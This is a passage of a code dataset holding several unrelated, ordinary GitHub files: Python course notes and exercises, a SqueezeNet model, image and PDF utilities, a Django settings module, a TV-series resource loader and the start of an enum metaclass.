i,s[i])\n\n\t\n0 a\n1 p\n2 p\n3 l\n4 e\n>>> \n\nnested loops\n\naccumulator:\n 0) set up iteration (visit/print items)\n 1) init accum before loop\n 2) accumulate in the loop\n 3) return accum after loop\n\nsearch pattern:\ndef\n for\n if\n return\n return\n\nthis is NEVER correct:\n\ndef \n for\n if\n return\n else\n return\n\nwhile loop:\n not clear what you are iterating over in advance\n keep track of state (variables)\n\n\nwhen you want the body to execute at least once:\n 1) loop and a half pattern\n part of the body is repeated outside loop\n 2) infinite loop pattern, while True\n if ... break inside loop\n\ndef\n return vs. 
print\n arguments/parameters\n\nx is the parameter, 3 is the argument\n>>> def f(x):\n\treturn x*2\n>>> f(3)\n6\n\n'''\n\n\n'''\nmake this work:\n>>> matches( [3,3,5,6], [5,3])\n[ (0,1),(1,1),(2,0)]\n'''\n\ndef matches( lsta, lstb ):\n\n locs = []\n for i in range(len(lsta)):\n for j in range(len(lstb)):\n if lsta[i]==lstb[j]:\n #print( i,lsta[i],j,lstb[j])\n locs.append( (i,j) )\n return locs\n \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"arpan-code/CSC-241-Introduction-to-Computer-Science-I","sub_path":"Notes/Week 10/review.py","file_name":"review.py","file_ext":"py","file_size_in_byte":4032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"21592767822","text":"#Creates a list typed by the user\nx = int(input(\"How many numbers do you plan to enter?\"))\nlista = []\nfor i in range(x):\n lista.append(input(\"Type here:\"))\n ultimo = len(lista)\n if ultimo == -1:\n lista.clear()\n print(lista)\n\n","repo_name":"Davi-s-Brain/projetos_simples","sub_path":"Python/ex42.py","file_name":"ex42.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"19050077693","text":"import math\nimport os.path\nimport time\nfrom typing import List, Optional\n\nimport cv2\nimport numpy as np\nimport torch\nimport torchvision.transforms.functional as F\n\n\ndef make_divisible(v: float, divisor: int, min_value: Optional[int] = None) -> int:\n \"\"\"\n This function is taken from the original tf repo.\n It ensures that all layers have a channel number that is divisible by 8\n It can be seen here:\n https://github.com/tensorflow/models/blob/master/research/slim/nets/mobilenet/mobilenet.py\n \"\"\"\n if min_value is None:\n min_value = divisor\n new_v = max(min_value, int(v + divisor / 2) // divisor * divisor)\n # Make sure that round down does not go down by more than 10%.\n if new_v < 0.9 * v:\n new_v += divisor\n return new_v\n\n\n# def auto_padding(k, s, d=1):\n# \"\"\"\n#\n# Args:\n# k: kernel size\n# s: stride\n# d: dilation\n#\n# Returns: padding value\n#\n# \"\"\"\n# return math.ceil((d*(k-1)+1-s)/2)\n\n\ndef opencv_read_image(image_path):\n image_array = cv2.imread(image_path, cv2.IMREAD_COLOR | cv2.IMREAD_IGNORE_ORIENTATION)\n image_array = cv2.cvtColor(image_array, cv2.COLOR_BGR2RGB)\n return image_array # dtype = np.uint8\n\n\ndef read_image(image_paths: List[str], add_dim=False, convert_to_tensor=False, resize=False, size=None):\n n = len(image_paths)\n if n == 1:\n # only one image\n image_array = opencv_read_image(image_paths[0])\n if add_dim:\n image_array = np.expand_dims(image_array, axis=0)\n else:\n # multiple images\n image_list = list()\n for i in range(n):\n image = opencv_read_image(image_paths[i])\n image_list.append(image)\n image_array = np.stack(image_list, axis=0)\n if convert_to_tensor:\n image_array = image_array.astype(np.float32)\n image_array /= 255.0\n image_tensor = torch.from_numpy(image_array) # (N, H, W, C)\n image_tensor = torch.permute(image_tensor, dims=(0, 3, 1, 2)) # (N, C, H, W)\n if resize and size is not None:\n image_tensor = F.resize(image_tensor, size)\n return image_tensor\n return image_array\n\n\ndef download_file(url, model_dir):\n auto_make_dirs(model_dir)\n if os.path.exists(model_dir):\n print(f\"File '{model_dir}' already exists.\")\n else:\n print(f\"Start downloading from: {url}\")\n torch.hub.download_url_to_file(url=url, dst=model_dir)\n # r = requests.get(url, stream=True)\n # 
total = int(r.headers.get(\"content-length\", 0))\n # with open(model_dir, mode=\"wb\") as f, \\\n # tqdm(desc=model_path, total=total, unit='iB', unit_scale=True, unit_divisor=1024) as bar:\n # for data in r.iter_content(chunk_size=1024):\n # size = f.write(data)\n # bar.update(size)\n print(\"Download completed!\")\n\n\ndef load_state_dict_from_url(url, model_dir, map_location=None):\n download_file(url, model_dir)\n return torch.load(model_dir, map_location=map_location)\n\n\ndef get_current_format_time():\n return time.strftime(\"%Y-%m-%d_%H-%M-%S\", time.localtime())\n\n\ndef get_format_filename(model_name: str, dataset_name: str, addition: str = None) -> str:\n return model_name + \"_\" + dataset_name + \"_\" + addition\n\n\ndef auto_make_dirs(file_path):\n dir = os.path.dirname(file_path)\n if not os.path.exists(dir):\n os.makedirs(dir)","repo_name":"calmisential/Image_Classification.pytorch","sub_path":"core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"5083783308","text":"t = int(input())\nfor _ in range(t):\n n = int(input())\n nums = list(map(int, input().split()))\n\n nums.sort()\n\n c = 1\n for i in range(len(nums)):\n while nums[i] % 2 == 0:\n nums[i] //= 2\n c *= 2\n maxi = max(nums)\n print(maxi * c + (sum(nums) - maxi))\n\n ","repo_name":"yohanse/A2SV","sub_path":"B_Divide_and_Multiply.py","file_name":"B_Divide_and_Multiply.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"13647807185","text":"from __future__ import unicode_literals\n\nimport six\nimport logging\nimport requests\nfrom ..core import Episode\nfrom ..core.json import load as load_json\nfrom pyannote.core import T\nimport sys\n\n\nTVD_RESOURCE_URL = 'url'\nTVD_RESOURCE_SEASON = 'season'\nTVD_RESOURCE_EPISODE = 'episode'\nTVD_RESOURCE_SOURCE = 'source'\nTVD_RESOURCE_TYPE = 'type'\nTVD_ACKNOWLEDGEMENT = \"\"\"\nIN CASE YOU USE '{resource}' RESOURCES, PLEASE CONSIDER CITING:\n{reference}\n\"\"\"\n\n\nclass ResourceMixin(object):\n\n def init_resource(self, resources):\n\n # initialize web resources data structure\n # resources[episode] contains all resources for a given episode\n self.resources = {}\n\n # loop on web resources described in 'resources' section\n for resource_type, resource in six.iteritems(resources):\n\n if self.acknowledgment and 'source' in resource:\n sys.stdout.write(TVD_ACKNOWLEDGEMENT.format(\n resource=resource_type, reference=resource['source']))\n\n # obtain corresponding 'get_resource' method\n resource_method = self._get_resource_method(resource_type)\n\n # read resource 'source' from YAML configuration when provided\n source = resource.get(TVD_RESOURCE_SOURCE, None)\n\n # read resource 'type' from YAML configuration when provided\n data_type = resource.get(TVD_RESOURCE_TYPE, None)\n\n # loop on all provided URLs\n # NB: some episodes might not have some resources\n for url in resource.get(TVD_RESOURCE_URL, []):\n\n season_number = url[TVD_RESOURCE_SEASON]\n episode_number = url[TVD_RESOURCE_EPISODE]\n episode = Episode(\n series=self.__class__.__name__,\n season=season_number,\n episode=episode_number\n )\n\n # add episode to resource main structure\n # in case it is the first time it is encountered\n if episode not in self.resources:\n self.resources[episode] = {}\n\n # initialize resource placeholder\n self.resources[episode][resource_type] = 
{\n # method to call to get the resource\n 'method': resource_method,\n # parameters to pass to method to get the resource\n 'params': {\n 'url': url[TVD_RESOURCE_URL],\n 'source': source,\n 'episode': episode\n },\n # results of call \"method(**params)\"\n # NB: it is set to None until we actually get this resource\n 'result': None,\n # data type (transcription, annotation, else ?)\n 'type': data_type\n }\n\n def _get_resource_method(self, resource_type):\n \"\"\"Get method for given resource\n\n resource_type : str\n Resource type, as provided in YAML configuration file\n\n Returns\n -------\n method : callable\n Method defined in inheriting plugin to be used\n to obtain `resource_type` resource\n\n \"\"\"\n resource_method = getattr(self, resource_type, None)\n\n if resource_method is None:\n\n error = 'Class %s has no method called %s.' % (\n self.__class__.__name__, resource_type)\n\n raise ValueError(error)\n\n return resource_method\n\n def has_resource(self, resource_type, episode):\n \"\"\"\n Checks whether resource `resource_type` exists\n for given `episode`\n\n Parameters\n ----------\n resource_type : str\n episode : `tvd.Episode`\n \"\"\"\n\n resources = self.resources.get(episode, None)\n if resources is None:\n return False\n\n resource = resources.get(resource_type, None)\n if resource is None:\n return False\n\n return True\n\n def get_resource_from_disk(self, resource_type, episode):\n \"\"\"Load resource from disk, store it in memory and return it\n\n Parameters\n ----------\n episode : Episode\n Episode\n resource_type : str\n Type of resource\n\n Returns\n -------\n resource : Timeline, Annotation or Transcription\n Resource of type `resource_type` for requested episode\n\n Raises\n ------\n Exception\n If the resource is not available on disk\n\n \"\"\"\n\n msg = 'getting {t:s} for {e!s} from disk'\n logging.debug(msg.format(e=episode, t=resource_type))\n\n path = self.path_to_resource(episode, resource_type)\n result = load_json(path)\n\n msg = 'saving {t:s} for {e!s} into memory'\n logging.debug(msg.format(e=episode, t=resource_type))\n\n self.resources[episode][resource_type]['result'] = result\n\n return result\n\n def get_resource_from_memory(self, resource_type, episode):\n \"\"\"Load resource from memory\n\n Parameters\n ----------\n episode : Episode\n Episode\n resource_type : str\n Type of resource\n\n Returns\n -------\n resource : Timeline, Annotation or Transcription\n Resource of type `resource_type` for requested episode\n\n Raises\n ------\n Exception\n If the resource is not available in memory\n \"\"\"\n\n msg = 'getting {t:s} for {e!s} from memory'\n logging.debug(msg.format(e=episode, t=resource_type))\n\n result = self.resources[episode][resource_type]['result']\n\n if result is None:\n msg = 'resource {t:s} for {e!s} is not available in memory'\n raise ValueError(msg.format(e=episode, t=resource_type))\n\n return result\n\n def get_resource_from_plugin(self, resource_type, episode):\n \"\"\"Load resource from plugin, store it in memory and return it\n\n Parameters\n ----------\n episode : Episode\n Episode\n resource_type : str\n Type of resource\n\n Returns\n -------\n resource : Timeline, Annotation or Transcription\n Resource of type `resource_type` for requested episode\n\n Raises\n ------\n Exception\n If plugin failed to provide the requested resource\n \"\"\"\n\n msg = 'getting {t:s} for {e!s} from plugin'\n logging.debug(msg.format(e=episode, t=resource_type))\n\n resource = self.resources[episode][resource_type]\n method = 
resource['method']\n        params = resource['params']\n\n        T.reset()\n        result = method(**params)\n\n        msg = 'saving {t:s} for {e!s} into memory'\n        logging.debug(msg.format(e=episode, t=resource_type))\n\n        self.resources[episode][resource_type]['result'] = result\n\n        return result\n\n    def get_resource(self, resource_type, episode, update=False):\n        \"\"\"Get resource\n\n        Parameters\n        ----------\n        resource_type: str\n        episode : Episode\n        update : bool, optional\n\n        Returns\n        -------\n        resource : Timeline, Annotation or Transcription\n            Resource of type `resource_type` for requested `episode`\n\n        Raises\n        ------\n        ValueError\n            If plugin failed to provide the requested resource.\n\n        \"\"\"\n\n        result = None\n\n        if update:\n            funcs = [self.get_resource_from_plugin]\n\n        else:\n            funcs = [self.get_resource_from_memory,\n                     self.get_resource_from_disk,\n                     self.get_resource_from_plugin]\n\n        for func in funcs:\n            try:\n                result = func(resource_type, episode)\n                break\n\n            except Exception:\n                continue\n\n        if result is None:\n            error = 'cannot get {t:s} for episode {e!s}'\n            raise ValueError(error.format(t=resource_type, e=episode))\n\n        return result\n\n    def iter_resources(self, resource_type=None, episode=None,\n                       data=False, update=True):\n        \"\"\"Resource iterator\n\n        Resources are yielded in episode chronological order\n        and resource name alphabetical order\n\n        Parameters\n        ----------\n        resource_type : str, optional\n            When provided, only iterate over this resource type\n        episode : `tvd.Episode`, optional\n            When provided, only iterate over resources for this episode\n        data : boolean, optional\n            Whether to yield actual data\n\n        Returns\n        -------\n        (episode, resource_type[, data]) iterator\n        \"\"\"\n\n        # loop on episodes in airing chronological order\n        for _episode in sorted(self.resources):\n\n            # skip this episode if not requested\n            if (episode is not None) and \\\n               (episode != _episode):\n                continue\n\n            # loop on resources in name alphabetical order\n            for _resource_type in sorted(self.resources[_episode]):\n\n                # skip this resource if not requested\n                if (resource_type is not None) and \\\n                   (resource_type != _resource_type):\n                    continue\n\n                # really get this resource\n                if data:\n                    _data = self.get_resource(_resource_type, _episode,\n                                              update=update)\n                    yield _episode, _resource_type, _data\n\n                else:\n                    yield _episode, _resource_type\n\n    def get_all_resources(self, update=False):\n\n        resources = {}\n\n        for episode, resource_type in self.iter_resources(\n            resource_type=None, episode=None, data=False\n        ):\n\n            if episode not in resources:\n                resources[episode] = {}\n\n            resource = self.get_resource(resource_type, episode, update=update)\n\n            resources[episode][resource_type] = resource\n\n        return resources\n\n    CHARACTER_MAPPING = {\n        # hyphen\n        ord(u'\\u2013'): u\"-\", # –\n        ord(u'\\u2014'): u\"-\", # —\n        # quote\n        ord(u'\\u2018'): u\"'\", # ‘\n        ord(u'\\u2019'): u\"'\", # ’\n        # double-quote\n        ord(u'\\u201c'): u'\"', # “\n        ord(u'\\u201d'): u'\"', # ”\n        # space\n        ord(u'\\u200b'): u\" \", #\n        ord(u'\\xa0'): u\" \", #\n        # other\n        ord(u'\\u2026'): u\"...\", # …\n        # ord(u'\\xe9'): u\"é\"\n    }\n\n    HTML_MAPPING = {\n        # hyphen\n        u\"–\": u\"-\",\n        # quote\n        u\"‘\": u\"'\",\n        u\"’\": u\"'\",\n        u\"&quot;\": '\"',\n        # double-quote\n        u\"“\": u'\"',\n        u\"”\": u'\"',\n        # other\n        u\"…\": u\"...\"\n    }\n\n    def clean_text(self, udata):\n\n        # apply mapping tables\n        udata = udata.translate(self.CHARACTER_MAPPING)\n        for old, new in six.iteritems(self.HTML_MAPPING):\n            udata = udata.replace(old, new)\n        return udata
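    # Usage sketch (illustrative, not from the repo): clean_text() folds the
    # curly quotes, long dashes, HTML entities and ellipses mapped above into
    # plain ASCII equivalents, e.g.
    #
    #     >>> plugin.clean_text(u'\u201cOk\u201d \u2013 it\u2019s done\u2026')
    #     u'"Ok" - it\'s done...'
    #
    # (`plugin` stands for any object whose class mixes in ResourceMixin)
\n\n    def download_as_utf8(self, url):\n        \"\"\"Download 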
webpage content as UTF-8\n\n        Parameters\n        ----------\n        url : str\n            Webpage URL\n\n        Returns\n        -------\n        text : unicode\n            Webpage content as unicode UTF-8 text\n\n        \"\"\"\n\n        # request URL content with dummy user-agent\n        user_agent = {'User-agent': 'TVD'}\n        r = requests.get(url, headers=user_agent)\n\n        # get content as UTF-8 unicode\n        r.encoding = 'UTF-8'\n\n        return self.clean_text(r.text)\n","repo_name":"tvd-dataset/tvd","sub_path":"tvd/plugin/resource.py","file_name":"resource.py","file_ext":"py","file_size_in_byte":11768,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"29"}
+{"seq_id":"29199576722","text":"from libs.kp_fraydit.classes import BaseClass\nfrom libs.kp_fraydit.class_iterators import ClassIterator\n\nfrom cassandra.encoder import Encoder\n\ncql_encoder = Encoder()\n\n\nclass ApplicationFields(ClassIterator):\n    def __init__(self, group_list=None):\n        super().__init__(group_list=group_list, primary_key='name')\n\n    @classmethod\n    def from_list(cls, l: list):\n        my_list = []\n        for unconverted_field in l:\n            my_list.append(ApplicationField.from_dict(unconverted_field))\n        return cls(group_list=my_list)\n\n    def convert_to_dict(self):\n        d = dict()\n        for field in self.objList:\n            d = {**d, **field.to_dict}\n        \n        return d\n\n    def convert_to_db_format(self):\n        return cql_encoder.cql_encode_map_collection(self.convert_to_dict())\n    \n\n\n\nclass ApplicationField(BaseClass):\n    def __init__(self, name: str, type: str, values: set):\n        self.__name = name\n        self.__type = type\n        self.__values = values\n\n    @classmethod\n    def from_db(cls, key, value):\n        # stored format is \"<type>|<comma-separated values>\"\n        type, values = value.split('|')\n        values_list = values.split(',')\n        values_set = set(values_list)\n        return cls(key, type, values_set)\n\n\n    @classmethod\n    def from_dict(cls, d: dict):\n        if d.get('name') is not None: name = d.get('name')\n        elif d.get('Name') is not None: name = d.get('Name')\n        elif d.get('fieldName') is not None: name = d.get('fieldName')\n        elif d.get('field_name') is not None: name = d.get('field_name')\n        else: name = ''\n\n        if d.get('type') is not None: type = d.get('type')\n        elif d.get('Type') is not None: type = d.get('Type')\n        elif d.get('fieldType') is not None: type = d.get('fieldType')\n        elif d.get('field_type') is not None: type = d.get('field_type')\n        else: type = ''\n\n        if d.get('values') is not None: values = d.get('values')\n        elif d.get('Values') is not None: values = d.get('Values')\n        elif d.get('fieldValues') is not None: values = d.get('fieldValues')\n        elif d.get('field_values') is not None: values = d.get('field_values')\n        else: values = ''\n\n        values_set = set(values)\n        return cls(name, type, values_set)\n\n    @property\n    def name(self) -> str:\n        return self.__name\n\n    @property\n    def type(self) -> str:\n        return self.__type\n\n    @property\n    def values(self) -> set:\n        return self.__values\n\n\n    @property\n    def to_dict(self) -> dict:\n        d = dict()\n        d[self.name] = f'{self.type}|{(\",\").join(self.values)}'\n        return d","repo_name":"coldicefisher/dispatch","sub_path":"web/source_code/libs/cass_auth/applications/application_field.py","file_name":"application_field.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
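# Usage sketch (illustrative, not from the repo): round-tripping a field
# through the "<type>|<v1,v2>" storage format used by from_db/to_dict above.
#
#     field = ApplicationField('status', 'text', {'open', 'closed'})
#     encoded = field.to_dict['status']          # e.g. 'text|open,closed'
#     again = ApplicationField.from_db('status', encoded)
#     assert again.values == {'open', 'closed'}
+{"seq_id":"71558413837","text":"import torch\nimport torch.nn as nn\nfrom torchvision.models import squeezenet1_0\nfrom torchvision import transforms\nfrom PIL import 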
Image\n\n\nclass Fire(nn.Module):\n    def __init__(self, in_channels, squeeze_channels, expand1x1_channels, expand3x3_channels):\n        super(Fire, self).__init__()\n\n        self.squeeze = nn.Conv2d(in_channels, squeeze_channels, kernel_size=1)\n        self.squeeze_activation = nn.ReLU(inplace=True)\n\n        self.expand1x1 = nn.Conv2d(squeeze_channels, expand1x1_channels, kernel_size=1)\n        self.expand1x1_activation = nn.ReLU(inplace=True)\n\n        self.expand3x3 = nn.Conv2d(squeeze_channels, expand3x3_channels, kernel_size=3, padding=1)\n        self.expand3x3_activation = nn.ReLU(inplace=True)\n\n    def forward(self, X):\n        X = self.squeeze_activation(self.squeeze(X))\n        X = torch.cat([\n            self.expand1x1_activation(self.expand1x1(X)),\n            self.expand3x3_activation(self.expand3x3(X))\n        ], dim=1)\n\n        return X\n\n\n\nclass SqueezeNet(nn.Module):\n    def __init__(self):\n        super(SqueezeNet, self).__init__()\n\n        self.features = nn.Sequential(\n            nn.Conv2d(in_channels=3, out_channels=96, kernel_size=7, stride=2),\n            nn.ReLU(inplace=True),\n            nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True),\n            Fire(96, 16, 64, 64),\n            Fire(128, 16, 64, 64),\n            Fire(128, 32, 128, 128),\n            nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True),\n            Fire(256, 32, 128, 128),\n            Fire(256, 48, 192, 192),\n            Fire(384, 48, 192, 192),\n            Fire(384, 64, 256, 256),\n            nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True),\n            Fire(512, 64, 256, 256)\n        )\n\n        self.classifier = nn.Sequential(\n            nn.Dropout(p=0.5),\n            nn.Conv2d(512, 1000, kernel_size=1), # output: 13*13*1000\n            nn.ReLU(inplace=True),\n            nn.AdaptiveAvgPool2d((1, 1)) # output: 1*1*1000\n        )\n\n    def forward(self, X):\n        X = self.features(X)\n        print(X.shape)\n        X = self.classifier(X)\n        return torch.flatten(X, 1)\n\n# image preprocessing: resize to a fixed 224x224, convert to a torch tensor, normalize\ntran = transforms.Compose([\n    transforms.Resize((224,224)),\n    transforms.ToTensor(),\n    transforms.Normalize(mean=[0.485, 0.456, 0.406],\n                         std=[0.229, 0.224, 0.225])\n])\n\nif __name__ == '__main__':\n    image = Image.open(\"tiger.jpeg\")\n    image = tran(image)\n    image = torch.unsqueeze(image, dim=0)\n\n    net = SqueezeNet()\n    # net = squeezenet1_0()\n    for name, parameter in net.named_parameters():\n        print(\"name={},size={}\".format(name, parameter.size()))\n    device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n    net = net.to(device)\n    image = image.to(device)\n    net.load_state_dict(torch.load(\"squeezenet1_0-a815701f.pth\")) # load the model weights pretrained in pytorch\n    net.eval()\n\n    output = net(image)\n    test, prop = torch.max(output, 1)\n    synset = [l.strip() for l in open(\"synset.txt\").readlines()]\n    print(\"top1:\", synset[prop.item()])\n\n    preb_index = torch.argsort(output, dim=1, descending=True)[0]\n    top5 = [(synset[preb_index[i]], output[0][preb_index[i]].item()) for i in range(5)]\n    print((\"Top5: \", top5))\n\n\n\n","repo_name":"l274282603/CV_ConvNetModel","sub_path":"SqueezeNet/SqueezeNet_pytorch.py","file_name":"SqueezeNet_pytorch.py","file_ext":"py","file_size_in_byte":3334,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"}
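# Shape sanity check (sketch, not part of the repo): a Fire module concatenates
# its 1x1 and 3x3 expand branches along the channel axis, so Fire(96, 16, 64, 64)
# maps (N, 96, H, W) to (N, 64+64, H, W):
#
#     x = torch.randn(1, 96, 54, 54)
#     assert Fire(96, 16, 64, 64)(x).shape == (1, 128, 54, 54)
+{"seq_id":"4780092975","text":"\"\"\"\nProblem\nThe sum of N distinct natural numbers is S. 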
Given S, what is the maximum possible value of N?\n\nInput\nThe first line contains a natural number S (1 ≤ S ≤ 4,294,967,295).\n\nOutput\nPrint the maximum value of N on the first line.\n\"\"\"\n\nimport sys\ninput = sys.stdin.readline\n\nS = int(input())\n# find the largest n such that 1 + 2 + ... + n = n*(n+1)/2 does not exceed S;\n# the loop stops one step past it, so the answer is n - 1\nn = 1\ntotal = 0\nwhile True:\n    total = n * (n + 1) // 2\n    if total > S:\n        break\n    n = n + 1\n\nprint(n-1)","repo_name":"singsoong/BOJsolve","sub_path":"1789_수들의 합.py","file_name":"1789_수들의 합.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
+{"seq_id":"39381213752","text":"\"\"\"\nDjango base settings\n\nDESCRIPTION:\nThis file contains common settings between the development and\nproduction environments. Feel free to add additional settings\nfiles for staging and testing.\n\nSECURITY:\nYour django SECRET_KEY will be autogenerated in 'secrets.json'.\nPassword sensitive settings and API keys should go into 'secrets.py'.\n\nMore information on the Django settings file:\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\nDjango Extensions Commands:\nhttp://django-extensions.readthedocs.org/en/latest/command_extensions.html\n\"\"\"\n\n################################################################\n# BASE APPLICATION SETTINGS\n################################################################\nDJANGO_APPS = [\n    'django.contrib.auth',\n    'django.contrib.contenttypes',\n    'django.contrib.sessions',\n    'django.contrib.messages',\n    'django.contrib.staticfiles',\n]\n\nPLUGIN_APPS = [\n    'grappelli',\n    'braces',\n    'django_extensions',\n    'django.contrib.admin',\n]\n\nPROJECT_APPS = [\n    'vanilla.apps.core',\n    'vanilla.apps.website',\n]\n\nINSTALLED_APPS = DJANGO_APPS + PLUGIN_APPS + PROJECT_APPS\n\n\n################################################################\n# BASE CONFIGURATION SETTINGS\n################################################################\n\n# Django root urls file\nROOT_URLCONF = 'vanilla.urls'\n\n# WSGI application\nWSGI_APPLICATION = 'vanilla.wsgi.application'\n\n# Debug settings\nDEBUG = False\nTEMPLATE_DEBUG = False\n\n# Site URL extras\nAPPEND_SLASH = True\nPREPEND_WWW = False\n\n# Specify hosts\nALLOWED_HOSTS = [\n    'localhost'\n]\n\n\n################################################################\n# BASE DIRECTORY SETTINGS\n################################################################\nfrom unipath import Path\n\n# Same directory as `manage.py`\nBASE_DIR = Path(__file__).ancestor(3)\nSTATIC_URL = '/static/'\nMEDIA_URL = '/media/'\n\nSTATICFILES_DIRS = (\n    BASE_DIR.child('static'),\n)\n\n################################################################\n# BASE MIDDLEWARE SETTINGS\n################################################################\nMIDDLEWARE_CLASSES = (\n    'django.contrib.sessions.middleware.SessionMiddleware',\n    'django.middleware.common.CommonMiddleware',\n    'django.middleware.csrf.CsrfViewMiddleware',\n    'django.contrib.auth.middleware.AuthenticationMiddleware',\n    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n    'django.contrib.messages.middleware.MessageMiddleware',\n    'django.middleware.clickjacking.XFrameOptionsMiddleware',\n    'django.middleware.cache.UpdateCacheMiddleware',\n    'django.middleware.common.CommonMiddleware',\n    'django.middleware.cache.FetchFromCacheMiddleware',\n)\n\n\n################################################################\n# BASE SECRETS SETTINGS\n################################################################\nfrom django.core.exceptions import ImproperlyConfigured as ICONFIG\nfrom 
vanilla.settings.secrets import *\nfrom json import loads as loadjson\n\ntry:\n with open('secrets.json') as fp:\n SECRETS = loadjson(fp.read())\n SECRET_KEY = SECRETS['SECRET_KEY']\nexcept IOError:\n raise ICONFIG('File not found: secrets.json')\nexcept KeyError:\n raise ICONFIG('SECRET_KEY is not defined.')\n\n\n################################################################\n# BASE AUTHENTICATION SETTINGS\n################################################################\n\n# The model to use to represent a User.\nAUTH_USER_MODEL = 'auth.User'\n\n# The URL where requests are redirected for login.\n# LOGIN_URL = '/accounts/login/'\n\n# The URL where requests are redirected for logout.\n# LOGOUT_URL = '/accounts/logout/'\n\n# The URL where requests are redirected after login.\n# LOGIN_REDIRECT_URL = '/accounts/profile/'\n\n\n################################################################\n# BASE INTERNATIONALIZATION / MISC SETTINGS\n################################################################\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'UTC'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n","repo_name":"codenameyau/vagrant-boxes","sub_path":"vagrant-django/vanilla/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4055,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"38212944063","text":"import jinja2\nimport os\nimport shutil\nfrom django.core.management.base import BaseCommand\nfrom datetime import datetime, date\nfrom PyPDF2 import PdfFileReader, PdfFileWriter\nfrom assessments.models import Survey\nfrom boundary.models import ElectionBoundary, Boundary\n\n\nclass CommonUtils():\n \n def initiatelatex(self):\n # create the build directory if not existing\n if not os.path.exists(self.build_d):\n os.makedirs(self.build_d)\n latex_jinja_env = jinja2.Environment(\n variable_start_string='{{',\n variable_end_string='}}',\n comment_start_string='\\#{',\n comment_end_string='}',\n line_comment_prefix='%%',\n trim_blocks=True,\n autoescape=False,\n loader=jinja2.FileSystemLoader(os.path.abspath('/'))\n )\n for filetype in self.templates:\n self.templates[filetype][\"latex\"] = latex_jinja_env.get_template(\n self.basefiledir+self.templatedir+self.templates[filetype][\"template\"])\n\n \n def validateGPIds(self, gpids):\n for gpid in gpids:\n print(gpid)\n try:\n ElectionBoundary.objects.get(id=gpid, const_ward_type='GP')\n except ElectionBoundary.DoesNotExist:\n print(\"Invalid gpid: \"+str(gpid)+\" passed\")\n return False\n return True\n\n def validateBoundaryIds(self, boundaryids, boundaryType):\n for bid in boundaryids:\n try:\n Boundary.objects.get(\n id=bid, boundary_type_id=boundaryType)\n except Boundary.DoesNotExist:\n print(\"Invalid districtid: \"+str(bid)+\" passed\")\n return False\n return True\n\n def validateSurveyId(self, surveyid):\n try:\n Survey.objects.get(id=surveyid)\n except Survey.DoesNotExist:\n print(\"Invalid surveyid: \"+str(surveyid)+\" passed\")\n return False\n return True\n\n def checkYearMonth(self, yearmonth):\n try:\n datetime.strptime(yearmonth, '%Y%m')\n except ValueError:\n print(\"Year month format is invalid it should be YYYYMM, \" +yearmonth)\n return False\n return True\n\n def deleteTempFiles(self, tempFiles):\n for f in tempFiles:\n os.remove(f)\n\n def mergeReports(self, outputdir, gpfile, schoolfiles, outputfile):\n inputfiles = [outputdir+gpfile]\n for schoolfile in schoolfiles:\n inputfiles.append(outputdir+schoolfile)\n self.combinePdfs(inputfiles, 
outputfile, outputdir) \n self.deleteTempFiles(inputfiles)\n\n def combinePdfs(self, inputfiles, outputfile, outputdir):\n input_streams = []\n try:\n # First open all the files, then produce the output file, and\n # finally close the input files. This is necessary because\n # the data isn't read from the input files until the write\n # operation.\n output_stream = open(outputdir+\"/\"+outputfile, 'wb')\n for input_file in inputfiles:\n input_streams.append(open(input_file, 'rb'))\n writer = PdfFileWriter()\n for reader in map(PdfFileReader, input_streams):\n for n in range(reader.getNumPages()):\n writer.addPage(reader.getPage(n))\n writer.write(output_stream)\n finally:\n for f in input_streams:\n f.close()\n\n def getAcademicYear(self, startyearmonth, endyearmonth):\n startyear = int(startyearmonth[0:4])\n startmonth = int(startyearmonth[4:6])\n if startmonth <= 5:\n acadyear = str(startyear-1)+\"-\"+str(startyear)\n else:\n acadyear = str(startyear)+\"-\"+str(startyear+1)\n return acadyear\n\n\n","repo_name":"klpdotorg/ilp","sub_path":"apps/gpcontest/management/commands/baseReport.py","file_name":"baseReport.py","file_ext":"py","file_size_in_byte":3855,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"20749709044","text":"from __future__ import absolute_import\n\nimport abc\nimport re\nfrom builtins import str as text\nfrom numbers import Number\n\nfrom future.utils import iteritems, with_metaclass\nfrom past.builtins import long\n\n# =============================================================================\n# CLASSES\n# =============================================================================\n\n\nclass _MetaEnumGroup(type):\n \"\"\"An EnumGroup metaclass.\"\"\"\n\n def __new__(cls, className, bases, classDict): # noqa: B902\n newCls = type.__new__(cls, className, bases, classDict)\n newCls.__init_enums__()\n newCls._cls = cls\n newCls._clsName = className\n newCls._clsBases = bases\n newCls._clsDict = classDict\n return newCls\n\n def __call__(cls, number):\n number = int(number)\n e = cls.Nothing\n for enum in cls._ENUMERATORS:\n if enum & number:\n if e:\n e = e | enum\n 